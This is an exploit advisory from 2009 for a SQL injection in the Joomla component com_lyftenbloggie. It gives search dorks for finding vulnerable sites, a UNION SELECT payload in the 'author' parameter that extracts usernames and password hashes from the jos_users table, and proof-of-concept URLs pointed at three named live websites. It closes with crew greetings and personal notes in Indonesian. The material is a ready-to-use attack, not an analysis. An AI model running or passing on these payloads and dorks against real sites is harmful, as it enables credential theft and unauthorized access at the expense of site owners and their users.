############################################################################################# ## Joomla Component com_lyftenbloggie Remote SQL injection vulnerability - (author) ## ## Author : kaMtiEz (kamzcrew@yahoo.com) ## ## Homepage : http://www.indonesiancoder.com ## ## Date : November 11, 2009 ## ############################################################################################# [ Software Information ] [+] Vendor : http://www.lyften.com/ [+] Download : http://www.lyften.com/products/lyftenbloggie/download/id-10.html [+] Description : LyftenBloggie is a blog publishing component for Joomla 1.5. LyftenBloggie is both free and opensource. [+] version : 1.0.4 or lower maybe also affected [+] Vulnerability : SQL injection [+] Dork : inurl:"com_lyftenbloggie" / "Powered by LyftenBloggie" [+] LOCATION : INDONESIA - JOGJA ############################################################################################# [ Vulnerable File ] http://127.0.0.1/index.php?option=com_lyftenbloggie&author=[ValidID][INDONESIANCODER] [ Exploit ] 62+union+select+1,concat_ws(0x3a,username,password),3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+jos_users-- [ PoC ] http://demo.lyften.com/index.php?option=com_lyftenbloggie&author=62+union+select+1,concat_ws(0x3a,username,password),1,1,@@version,666,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+jos_users-- http://www.elixa.com.au/joomlademo/index.php?option=com_lyftenbloggie&author=62+union+select+1,concat_ws(0x3a,username,password),1,1,@@version,666,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+jos_users-- http://evilobi.net/index.php?option=com_lyftenbloggie&author=62+union+select+1,concat_ws(0x3a,username,password),1,1,@@version,666,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+jos_users-- ############################################################################################# [ Thx TO ] [+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown [+] tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_an3h [+] Contrex,onthel,yasea,bugs,olivia,Jovan,Aar,Ardy,invent,Ronz [+] Coracore,black666girl,NepT,ichal,tengik,Gh4mb4s,rendy,Jack- and YOU!! [ NOTE ] [+] Babe enyak adek i love u pull dah .. [+] Setelah Bertapa kagak jelas sama Om Don Tukuesto ... akhirnya nemu lobang :D [+] M3NW5 Ku tunggu di kotaku ... wkwkwkw [ QUOTE ] [+] kaMtiEz -=- Don Tukulesto -=- M3NW5 -=- 30 hari mencari AuraKasih Ntah di mana kao sekarang sayang .. [+] AURAKASIH telpon gua yach .. hha